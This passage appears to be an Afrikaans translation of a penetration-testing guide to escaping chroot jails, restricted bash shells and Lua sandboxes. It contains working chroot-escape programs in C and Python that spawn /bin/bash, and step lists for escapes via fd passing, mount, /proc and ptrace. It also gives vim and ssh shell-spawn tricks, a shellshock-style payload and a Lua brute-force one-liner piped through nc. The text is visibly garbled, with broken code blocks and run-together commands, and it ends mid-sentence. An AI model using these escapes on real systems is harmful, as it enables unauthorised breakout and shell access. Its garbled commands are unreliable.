Van wikipedia: Die chroot-meganisme is nie bedoel om teen opsetlike manipulasie deur bevoorregte (root) gebruikers te beskerm nie. Op die meeste stelsels stap chroot-kontekste nie behoorlik op nie en chroot-programme met voldoende voorregte kan 'n tweede chroot uitvoer om te ontsnap.
Gewoonlik beteken dit dat jy as root binne die chroot moet wees om te ontsnap.
Die werktuigchw00t is geskep om die volgende scenarios te misbruik en te ontsnap uit chroot.
Root + Huidige Werkspad
As jy as root binne 'n chroot is, kan jy ontsnap deur 'n ander chroot te skep. Dit is omdat 2 chroots nie gelyktydig kan bestaan (in Linux), so as jy 'n vouer skep en dan 'n nuwe chroot skep op daardie nuwe vouer terwyl jy buite dit is, sal jy nou buite die nuwe chroot wees en dus sal jy in die FS wees.
Dit gebeur gewoonlik omdat chroot NIE jou werkspad na die aangeduide een skuif nie, sodat jy 'n chroot kan skep maar buite dit kan wees.
Gewoonlik sal jy nie die chroot binêre lêer binne 'n chroot-gevangenis vind nie, maar jy kan 'n binêre lêer saamstel, oplaai en uitvoer:
C: break_chroot.c
```c #include #include #include
//gcc break_chroot.c -o break_chroot
int main(void) { mkdir("chroot-dir", 0755); chroot("chroot-dir"); for(int i = 0; i < 1000; i++) { chdir(".."); } chroot("."); system("/bin/bash"); }
</details>
<details>
<summary>Python</summary>
```python
#!/usr/bin/python
import os
os.mkdir("chroot-dir")
os.chroot("chroot-dir")
for i in range(1000):
os.chdir("..")
os.chroot(".")
os.system("/bin/bash")
Dit is soortgelyk aan die vorige geval, maar in hierdie geval stoor die aanvaller 'n lêerbeskrywer na die huidige gids en dan skep die chroot in 'n nuwe vouer. Uiteindelik, aangesien hy toegang het tot daardie FDbuite die chroot, het hy toegang daartoe en hy ontsnap.
</details>
### Root + Fork + UDS (Unix Domain Sockets)
<div data-gb-custom-block data-tag="hint" data-style='warning'>
FD kan oorgedra word oor Unix-domeinsokkels, so:
* Skep 'n kinderproses (fork)
* Skep UDS sodat ouer en kind kan kommunikeer
* Voer chroot uit in kinderproses in 'n ander vouer
* In ouer proses, skep 'n FD van 'n vouer wat buite die nuwe kinderproses chroot is
* Dra daardie FD oor na die kinderproses deur die UDS te gebruik
* Kindproses verander na daardie FD, en omdat dit buite sy chroot is, sal hy die tronk ontsnap
</div>
### Root + Mount
<div data-gb-custom-block data-tag="hint" data-style='warning'>
* Koppel die hooftoestel (/) in 'n gids binne die chroot
* Chroot na daardie gids
Dit is moontlik in Linux
</div>
### Root + /proc
<div data-gb-custom-block data-tag="hint" data-style='warning'>
* Koppel procfs in 'n gids binne die chroot (as dit nog nie daar is nie)
* Soek na 'n pid wat 'n ander hoof-/cwd-inskrywing het, soos: /proc/1/root
* Chroot na daardie inskrywing
</div>
### Root(?) + Fork
<div data-gb-custom-block data-tag="hint" data-style='warning'>
* Skep 'n Fork (kinderproses) en chroot na 'n ander vouer dieper in die FS en CD daarop
* Vanuit die ouerproses, skuif die vouer waar die kinderproses in 'n vouer voor die chroot van die kinders is
* Hierdie kinderproses sal homself buite die chroot vind
</div>
### ptrace
<div data-gb-custom-block data-tag="hint" data-style='warning'>
* 'n Tyd gelede kon gebruikers sy eie prosesse vanuit 'n proses van homself foutopspoor... maar dit is nie meer standaard moontlik nie
* Hoe dan ook, as dit moontlik is, kan jy ptrace in 'n proses en 'n shellkode daarin uitvoer ([sien hierdie voorbeeld](linux-capabilities.md#cap\_sys\_ptrace)).
</div>
## Bash Tronke
### Enumerasie
Kry inligting oor die tronk:
```bash
echo $SHELL
echo $PATH
env
export
pwd
Wysig PATH
Kyk of jy die PATH omgewingsveranderlike kan wysig.
echo $PATH #See the path of the executables that you can usePATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin#Try to change the pathecho/home/*#List directory
Gebruik van vim
:setshell=/bin/sh:shell
Skep skripsie
Kyk of jy 'n uitvoerbare lêer kan skep met /bin/bash as inhoud
red/bin/bash> w wx/path #Write /bin/bash in a writable and executable path
Kry bash vanaf SSH
Indien jy toegang verkry via ssh, kan jy hierdie truuk gebruik om 'n bash-skoot uit te voer:
ssh-tuser@<IP>bash# Get directly an interactive shellsshuser@<IP>-t"bash --noprofile -i"sshuser@<IP>-t"() { :; }; sh -i "
Merk op dat elke keer as jy die vorige eenregelige kode in 'n verskillende lua-omgewing uitvoer, die volgorde van die funksies verander. Daarom, as jy 'n spesifieke funksie moet uitvoer, kan jy 'n brute force-aanval uitvoer deur verskillende lua-omgewings te laai en die eerste funksie van die biblioteek aan te roep:
#In this scenario you could BF the victim that is generating a new lua environment#for every interaction with the following line and when you are lucky#the char function is going to be executedfor k,chr in pairs(string) doprint(chr(0x6f,0x73,0x2e,0x65,0x78)) end#This attack from a CTF can be used to try to chain the function execute from "os" library#and "char" from string library, and the use both to execute a commandfor i in seq 1000; do echo "for k1,chr in pairs(string) do for k2,exec in pairs(os) do print(k1,k2) print(exec(chr(0x6f,0x73,0x2e,0x65,0x78,0x65,0x63,0x75,0x74,0x65,0x28,0x27,0x6c,0x73,0x27,0x29))) break end break end" | nc 10.10.10.10 10006 | grep -A5 "Code: char"; done
Kry 'n interaktiewe lua-skul: As jy binne 'n beperkte lua-skul is, kan jy 'n nuwe lua-skul (en hopelik onbeperkte) kry deur die volgende te skakel: